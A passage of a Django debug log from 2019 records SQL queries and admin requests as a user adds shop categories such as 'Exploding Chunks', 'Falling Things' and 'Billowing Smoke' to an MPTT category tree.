'8ojyyz7puuibh7rtqntt8ci0gyabthm9') [13/Dec/2019 13:07:41] "GET /shop/category/add/ HTTP/1.0" 200 8228 DEBUG 2019-12-13 13:07:41,507 utils 11259 139831317362432 (0.005) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-13T13:07:41.493369+00:00'::timestamptz AND "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'); args=(datetime.datetime(2019, 12, 13, 13, 7, 41, 493369, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') DEBUG 2019-12-13 13:07:41,511 utils 11259 139831317362432 (0.002) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) [13/Dec/2019 13:07:41] "GET /jsi18n/ HTTP/1.0" 200 3223 DEBUG 2019-12-13 13:07:56,271 utils 11259 139831317362432 (0.005) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-13T13:07:56.259979+00:00'::timestamptz AND "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'); args=(datetime.datetime(2019, 12, 13, 13, 7, 56, 259979, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') DEBUG 2019-12-13 13:07:56,274 utils 11259 139831317362432 (0.001) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) DEBUG 2019-12-13 13:07:56,282 utils 11259 139831317362432 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."id" = 3; args=(3,) DEBUG 2019-12-13 13:07:56,288 utils 11259 139831317362432 (0.000) SELECT (1) AS "a" FROM "shop_category" WHERE "shop_category"."id" = 3 LIMIT 1; args=(3,) DEBUG 2019-12-13 13:07:56,290 utils 11259 139831317362432 (0.000) SELECT (1) AS "a" FROM "shop_category" WHERE ("shop_category"."parent_id" = 3 AND "shop_category"."slug" = 'exploding-chunks') LIMIT 1; args=(3, 'exploding-chunks') DEBUG 2019-12-13 13:07:56,291 utils 11259 139831317362432 (0.000) SELECT (1) AS "a" FROM "shop_category" WHERE "shop_category"."name" = 'Exploding Chunks' LIMIT 1; args=('Exploding Chunks',) DEBUG 2019-12-13 13:07:56,295 utils 11259 139831317362432 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE ("shop_category"."name" > 'Exploding Chunks' AND "shop_category"."parent_id" = 3) ORDER BY "shop_category"."name" ASC, "shop_category"."lft" ASC LIMIT 1; args=('Exploding Chunks', 3) DEBUG 2019-12-13 13:07:56,297 utils 11259 139831317362432 (0.000) SELECT "shop_category"."lft", "shop_category"."rght", "shop_category"."level", "shop_category"."tree_id" FROM "shop_category" WHERE "shop_category"."id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC LIMIT 1; args=(3,) DEBUG 2019-12-13 13:07:56,298 utils 11259 139831317362432 (0.001) UPDATE "shop_category" SET "lft" = CASE WHEN "lft" > 3 THEN "lft" + 2 ELSE "lft" END, "rght" = CASE WHEN "rght" > 3 THEN "rght" + 2 ELSE "rght" END WHERE "tree_id" = 4 AND ("lft" > 3 OR "rght" > 3); args=[3, 2, 3, 2, 4, 3, 3] DEBUG 2019-12-13 13:07:56,302 utils 11259 139831317362432 (0.001) INSERT INTO "shop_category" ("name", "parent_id", "image", "description", "popular", "slug", "lft", "rght", "tree_id", "level") VALUES ('Exploding Chunks', 3, 'categories/2019/12/13/collection3_pKohXg6.png', 'Exploding Chunks', false, 'exploding-chunks', 4, 5, 4, 1) RETURNING "shop_category"."id"; args=('Exploding Chunks', 3, 'categories/2019/12/13/collection3_pKohXg6.png', 'Exploding Chunks', False, 'exploding-chunks', 4, 5, 4, 1) DEBUG 2019-12-13 13:07:56,304 utils 11259 139831317362432 (0.001) INSERT INTO "django_admin_log" ("action_time", "user_id", "content_type_id", "object_id", "object_repr", "action_flag", "change_message") VALUES ('2019-12-13T13:07:56.302863+00:00'::timestamptz, 6, 8, '23', 'Exploding Chunks', 1, '[{"added": {}}]') RETURNING "django_admin_log"."id"; args=(datetime.datetime(2019, 12, 13, 13, 7, 56, 302863, tzinfo=), 6, 8, '23', 'Exploding Chunks', 1, '[{"added": {}}]') [13/Dec/2019 13:07:56] "POST /shop/category/add/ HTTP/1.0" 302 0 DEBUG 2019-12-13 13:07:56,608 utils 11259 139831317362432 (0.005) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-13T13:07:56.594130+00:00'::timestamptz AND "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'); args=(datetime.datetime(2019, 12, 13, 13, 7, 56, 594130, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') DEBUG 2019-12-13 13:07:56,612 utils 11259 139831317362432 (0.001) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) DEBUG 2019-12-13 13:07:56,686 utils 11259 139831317362432 (0.003) DECLARE "_django_curs_139831317362432_1" NO SCROLL CURSOR WITH HOLD FOR SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-13 13:07:56,755 utils 11259 139831317362432 (0.001) UPDATE "django_session" SET "session_data" = 'YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', "expire_date" = '2019-12-27T13:07:56.752277+00:00'::timestamptz WHERE "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'; args=('YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', datetime.datetime(2019, 12, 27, 13, 7, 56, 752277, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') [13/Dec/2019 13:07:56] "GET /shop/category/add/ HTTP/1.0" 200 8285 DEBUG 2019-12-13 13:07:57,114 utils 11259 139831317362432 (0.003) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-13T13:07:57.105221+00:00'::timestamptz AND "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'); args=(datetime.datetime(2019, 12, 13, 13, 7, 57, 105221, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') DEBUG 2019-12-13 13:07:57,116 utils 11259 139831317362432 (0.001) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) [13/Dec/2019 13:07:57] "GET /jsi18n/ HTTP/1.0" 200 3223 DEBUG 2019-12-13 13:08:13,584 utils 11259 139831317362432 (0.003) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-13T13:08:13.574012+00:00'::timestamptz AND "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'); args=(datetime.datetime(2019, 12, 13, 13, 8, 13, 574012, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') DEBUG 2019-12-13 13:08:13,588 utils 11259 139831317362432 (0.001) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) DEBUG 2019-12-13 13:08:13,596 utils 11259 139831317362432 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."id" = 3; args=(3,) DEBUG 2019-12-13 13:08:13,603 utils 11259 139831317362432 (0.000) SELECT (1) AS "a" FROM "shop_category" WHERE "shop_category"."id" = 3 LIMIT 1; args=(3,) DEBUG 2019-12-13 13:08:13,606 utils 11259 139831317362432 (0.000) SELECT (1) AS "a" FROM "shop_category" WHERE ("shop_category"."parent_id" = 3 AND "shop_category"."slug" = 'exploding-dirt') LIMIT 1; args=(3, 'exploding-dirt') DEBUG 2019-12-13 13:08:13,607 utils 11259 139831317362432 (0.000) SELECT (1) AS "a" FROM "shop_category" WHERE "shop_category"."name" = 'Exploding Dirt' LIMIT 1; args=('Exploding Dirt',) DEBUG 2019-12-13 13:08:13,610 utils 11259 139831317362432 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE ("shop_category"."name" > 'Exploding Dirt' AND "shop_category"."parent_id" = 3) ORDER BY "shop_category"."name" ASC, "shop_category"."lft" ASC LIMIT 1; args=('Exploding Dirt', 3) DEBUG 2019-12-13 13:08:13,612 utils 11259 139831317362432 (0.000) SELECT "shop_category"."lft", "shop_category"."rght", "shop_category"."level", "shop_category"."tree_id" FROM "shop_category" WHERE "shop_category"."id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC LIMIT 1; args=(3,) DEBUG 2019-12-13 13:08:13,613 utils 11259 139831317362432 (0.001) UPDATE "shop_category" SET "lft" = CASE WHEN "lft" > 5 THEN "lft" + 2 ELSE "lft" END, "rght" = CASE WHEN "rght" > 5 THEN "rght" + 2 ELSE "rght" END WHERE "tree_id" = 4 AND ("lft" > 5 OR "rght" > 5); args=[5, 2, 5, 2, 4, 5, 5] DEBUG 2019-12-13 13:08:13,617 utils 11259 139831317362432 (0.001) INSERT INTO "shop_category" ("name", "parent_id", "image", "description", "popular", "slug", "lft", "rght", "tree_id", "level") VALUES ('Exploding Dirt', 3, 'categories/2019/12/13/collection3_rYale9k.png', 'Exploding Dirt', false, 'exploding-dirt', 6, 7, 4, 1) RETURNING "shop_category"."id"; args=('Exploding Dirt', 3, 'categories/2019/12/13/collection3_rYale9k.png', 'Exploding Dirt', False, 'exploding-dirt', 6, 7, 4, 1) DEBUG 2019-12-13 13:08:13,618 utils 11259 139831317362432 (0.001) INSERT INTO "django_admin_log" ("action_time", "user_id", "content_type_id", "object_id", "object_repr", "action_flag", "change_message") VALUES ('2019-12-13T13:08:13.617709+00:00'::timestamptz, 6, 8, '24', 'Exploding Dirt', 1, '[{"added": {}}]') RETURNING "django_admin_log"."id"; args=(datetime.datetime(2019, 12, 13, 13, 8, 13, 617709, tzinfo=), 6, 8, '24', 'Exploding Dirt', 1, '[{"added": {}}]') [13/Dec/2019 13:08:13] "POST /shop/category/add/ HTTP/1.0" 302 0 DEBUG 2019-12-13 13:08:13,917 utils 11259 139831317362432 (0.003) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-13T13:08:13.908604+00:00'::timestamptz AND "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'); args=(datetime.datetime(2019, 12, 13, 13, 8, 13, 908604, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') DEBUG 2019-12-13 13:08:13,920 utils 11259 139831317362432 (0.001) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) DEBUG 2019-12-13 13:08:13,964 utils 11259 139831317362432 (0.002) DECLARE "_django_curs_139831317362432_1" NO SCROLL CURSOR WITH HOLD FOR SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-13 13:08:14,005 utils 11259 139831317362432 (0.001) UPDATE "django_session" SET "session_data" = 'YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', "expire_date" = '2019-12-27T13:08:14.003304+00:00'::timestamptz WHERE "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'; args=('YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', datetime.datetime(2019, 12, 27, 13, 8, 14, 3304, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') [13/Dec/2019 13:08:14] "GET /shop/category/add/ HTTP/1.0" 200 8333 DEBUG 2019-12-13 13:08:14,336 utils 11259 139831317362432 (0.004) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-13T13:08:14.325132+00:00'::timestamptz AND "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'); args=(datetime.datetime(2019, 12, 13, 13, 8, 14, 325132, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') DEBUG 2019-12-13 13:08:14,339 utils 11259 139831317362432 (0.002) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) [13/Dec/2019 13:08:14] "GET /jsi18n/ HTTP/1.0" 200 3223 DEBUG 2019-12-13 13:08:34,073 utils 11259 139831317362432 (0.003) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-13T13:08:34.063975+00:00'::timestamptz AND "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'); args=(datetime.datetime(2019, 12, 13, 13, 8, 34, 63975, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') DEBUG 2019-12-13 13:08:34,075 utils 11259 139831317362432 (0.001) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) DEBUG 2019-12-13 13:08:34,082 utils 11259 139831317362432 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."id" = 3; args=(3,) DEBUG 2019-12-13 13:08:34,088 utils 11259 139831317362432 (0.001) SELECT (1) AS "a" FROM "shop_category" WHERE "shop_category"."id" = 3 LIMIT 1; args=(3,) DEBUG 2019-12-13 13:08:34,091 utils 11259 139831317362432 (0.001) SELECT (1) AS "a" FROM "shop_category" WHERE ("shop_category"."parent_id" = 3 AND "shop_category"."slug" = 'falling-things') LIMIT 1; args=(3, 'falling-things') DEBUG 2019-12-13 13:08:34,093 utils 11259 139831317362432 (0.000) SELECT (1) AS "a" FROM "shop_category" WHERE "shop_category"."name" = 'Falling Things' LIMIT 1; args=('Falling Things',) DEBUG 2019-12-13 13:08:34,097 utils 11259 139831317362432 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE ("shop_category"."name" > 'Falling Things' AND "shop_category"."parent_id" = 3) ORDER BY "shop_category"."name" ASC, "shop_category"."lft" ASC LIMIT 1; args=('Falling Things', 3) DEBUG 2019-12-13 13:08:34,099 utils 11259 139831317362432 (0.000) SELECT "shop_category"."lft", "shop_category"."rght", "shop_category"."level", "shop_category"."tree_id" FROM "shop_category" WHERE "shop_category"."id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC LIMIT 1; args=(3,) DEBUG 2019-12-13 13:08:34,101 utils 11259 139831317362432 (0.001) UPDATE "shop_category" SET "lft" = CASE WHEN "lft" > 7 THEN "lft" + 2 ELSE "lft" END, "rght" = CASE WHEN "rght" > 7 THEN "rght" + 2 ELSE "rght" END WHERE "tree_id" = 4 AND ("lft" > 7 OR "rght" > 7); args=[7, 2, 7, 2, 4, 7, 7] DEBUG 2019-12-13 13:08:34,105 utils 11259 139831317362432 (0.001) INSERT INTO "shop_category" ("name", "parent_id", "image", "description", "popular", "slug", "lft", "rght", "tree_id", "level") VALUES ('Falling Things', 3, 'categories/2019/12/13/collection3_O3U2Kj1.png', 'Falling Things', false, 'falling-things', 8, 9, 4, 1) RETURNING "shop_category"."id"; args=('Falling Things', 3, 'categories/2019/12/13/collection3_O3U2Kj1.png', 'Falling Things', False, 'falling-things', 8, 9, 4, 1) DEBUG 2019-12-13 13:08:34,107 utils 11259 139831317362432 (0.001) INSERT INTO "django_admin_log" ("action_time", "user_id", "content_type_id", "object_id", "object_repr", "action_flag", "change_message") VALUES ('2019-12-13T13:08:34.106209+00:00'::timestamptz, 6, 8, '25', 'Falling Things', 1, '[{"added": {}}]') RETURNING "django_admin_log"."id"; args=(datetime.datetime(2019, 12, 13, 13, 8, 34, 106209, tzinfo=), 6, 8, '25', 'Falling Things', 1, '[{"added": {}}]') [13/Dec/2019 13:08:34] "POST /shop/category/add/ HTTP/1.0" 302 0 DEBUG 2019-12-13 13:08:34,408 utils 11259 139831317362432 (0.003) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-13T13:08:34.399141+00:00'::timestamptz AND "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'); args=(datetime.datetime(2019, 12, 13, 13, 8, 34, 399141, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') DEBUG 2019-12-13 13:08:34,410 utils 11259 139831317362432 (0.001) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) DEBUG 2019-12-13 13:08:34,460 utils 11259 139831317362432 (0.002) DECLARE "_django_curs_139831317362432_1" NO SCROLL CURSOR WITH HOLD FOR SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-13 13:08:34,505 utils 11259 139831317362432 (0.001) UPDATE "django_session" SET "session_data" = 'YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', "expire_date" = '2019-12-27T13:08:34.503168+00:00'::timestamptz WHERE "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'; args=('YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', datetime.datetime(2019, 12, 27, 13, 8, 34, 503168, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') [13/Dec/2019 13:08:34] "GET /shop/category/add/ HTTP/1.0" 200 8383 DEBUG 2019-12-13 13:08:34,869 utils 11259 139831317362432 (0.004) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-13T13:08:34.856592+00:00'::timestamptz AND "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'); args=(datetime.datetime(2019, 12, 13, 13, 8, 34, 856592, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') DEBUG 2019-12-13 13:08:34,875 utils 11259 139831317362432 (0.002) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) [13/Dec/2019 13:08:34] "GET /jsi18n/ HTTP/1.0" 200 3223 DEBUG 2019-12-13 13:09:05,468 utils 11259 139831317362432 (0.003) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-13T13:09:05.457628+00:00'::timestamptz AND "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'); args=(datetime.datetime(2019, 12, 13, 13, 9, 5, 457628, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') DEBUG 2019-12-13 13:09:05,470 utils 11259 139831317362432 (0.001) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) DEBUG 2019-12-13 13:09:05,476 utils 11259 139831317362432 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."id" = 4; args=(4,) DEBUG 2019-12-13 13:09:05,480 utils 11259 139831317362432 (0.000) SELECT (1) AS "a" FROM "shop_category" WHERE "shop_category"."id" = 4 LIMIT 1; args=(4,) DEBUG 2019-12-13 13:09:05,482 utils 11259 139831317362432 (0.000) SELECT (1) AS "a" FROM "shop_category" WHERE ("shop_category"."parent_id" = 4 AND "shop_category"."slug" = 'billowing-smoke') LIMIT 1; args=(4, 'billowing-smoke') DEBUG 2019-12-13 13:09:05,484 utils 11259 139831317362432 (0.000) SELECT (1) AS "a" FROM "shop_category" WHERE "shop_category"."name" = 'Billowing Smoke' LIMIT 1; args=('Billowing Smoke',) DEBUG 2019-12-13 13:09:05,486 utils 11259 139831317362432 (0.001) SELECT "shop_category"."lft", "shop_category"."rght", "shop_category"."level", "shop_category"."tree_id" FROM "shop_category" WHERE "shop_category"."id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC LIMIT 1; args=(4,) DEBUG 2019-12-13 13:09:05,487 utils 11259 139831317362432 (0.001) UPDATE "shop_category" SET "lft" = CASE WHEN "lft" > 1 THEN "lft" + 2 ELSE "lft" END, "rght" = CASE WHEN "rght" > 1 THEN "rght" + 2 ELSE "rght" END WHERE "tree_id" = 6 AND ("lft" > 1 OR "rght" > 1); args=[1, 2, 1, 2, 6, 1, 1] DEBUG 2019-12-13 13:09:05,490 utils 11259 139831317362432 (0.001) INSERT INTO "shop_category" ("name", "parent_id", "image", "description", "popular", "slug", "lft", "rght", "tree_id", "level") VALUES ('Billowing Smoke', 4, 'categories/2019/12/13/collection4_45IbUzs.png', 'Billowing Smoke', false, 'billowing-smoke', 2, 3, 6, 1) RETURNING "shop_category"."id"; args=('Billowing Smoke', 4, 'categories/2019/12/13/collection4_45IbUzs.png', 'Billowing Smoke', False, 'billowing-smoke', 2, 3, 6, 1) DEBUG 2019-12-13 13:09:05,492 utils 11259 139831317362432 (0.001) INSERT INTO "django_admin_log" ("action_time", "user_id", "content_type_id", "object_id", "object_repr", "action_flag", "change_message") VALUES ('2019-12-13T13:09:05.490892+00:00'::timestamptz, 6, 8, '26', 'Billowing Smoke', 1, '[{"added": {}}]') RETURNING "django_admin_log"."id"; args=(datetime.datetime(2019, 12, 13, 13, 9, 5, 490892, tzinfo=), 6, 8, '26', 'Billowing Smoke', 1, '[{"added": {}}]') [13/Dec/2019 13:09:05] "POST /shop/category/add/ HTTP/1.0" 302 0 DEBUG 2019-12-13 13:09:05,790 utils 11259 139831317362432 (0.003) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-13T13:09:05.781313+00:00'::timestamptz AND "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'); args=(datetime.datetime(2019, 12, 13, 13, 9, 5, 781313, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') DEBUG 2019-12-13 13:09:05,793 utils 11259 139831317362432 (0.001) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) DEBUG 2019-12-13 13:09:05,841 utils 11259 139831317362432 (0.002) DECLARE "_django_curs_139831317362432_1" NO SCROLL CURSOR WITH HOLD FOR SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-13 